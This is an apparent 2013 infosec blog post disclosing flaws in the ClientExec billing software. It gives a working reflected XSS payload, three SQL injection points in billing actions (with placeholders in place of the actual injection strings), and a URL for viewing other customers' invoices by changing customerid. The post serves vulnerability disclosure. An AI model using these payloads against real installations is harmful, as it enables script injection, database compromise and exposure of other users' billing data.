localhost
Random ramblings from someone working in InfoSec

contact me@localhost.re
archive - rss
2013/05/24

So I decided to give ClientExec a try. You know what kind of try :)

Let's start with XSS:

/order.php?step=subsearch&tld=false&name=1'){}}alert('xss');function+x(){if('

Some SQLi (log in as a client and set a valid sessionHash):

/index.php?sessionHash=&fuse=billing&sort=1,2&action=GetInvoiceEntries&invoiceid=[SQLi]
/index.php?sessionHash=&fuse=billing&action=GetInvoiceList&sort=[SQLi]
/index.php?sessionHash=&fuse=billing&action=GetUnInvoicedList&sort=[SQLi]

And uhm, let's view invoices of other users:

/index.php?sessionHash=&fuse=billing&action=GetInvoiceList&customerid=[Customer]

A lot more vulns, of different types, were found, stay tuned.